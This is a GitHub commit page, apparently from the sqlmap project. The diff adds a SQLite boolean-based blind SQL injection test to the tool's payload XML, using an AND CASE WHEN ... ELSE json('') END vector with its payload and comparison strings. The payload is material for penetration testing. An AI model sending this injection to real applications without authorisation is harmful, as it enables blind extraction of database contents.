Skip to content

Commit 2f66aa8

Browse files
authored
Add SQLite AND boolean-based blind payload (#5501)
1 parent a7cf68f commit 2f66aa8

File tree

1 file changed

+20
-0
lines changed

1 file changed

+20
-0
lines changed

data/xml/payloads/boolean_blind.xml

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -596,6 +596,26 @@ Tag: <test>
596596
<dbms>Oracle</dbms>
597597
</details>
598598
</test>
599+
600+
<test>
601+
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (json)</title>
602+
<stype>1</stype>
603+
<level>1</level>
604+
<risk>1</risk>
605+
<clause>1</clause>
606+
<where>1</where>
607+
<vector>AND CASE WHEN [INFERENCE] THEN 1 ELSE json('') END </vector>
608+
<request>
609+
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE json('') END</payload>
610+
</request>
611+
<response>
612+
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE json('') END</comparison>
613+
</response>
614+
<details>
615+
<dbms>SQLite</dbms>
616+
</details>
617+
</test>
618+
599619
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
600620

601621
<!-- Boolean-based blind tests - Parameter replace -->

0 commit comments

Comments
 (0)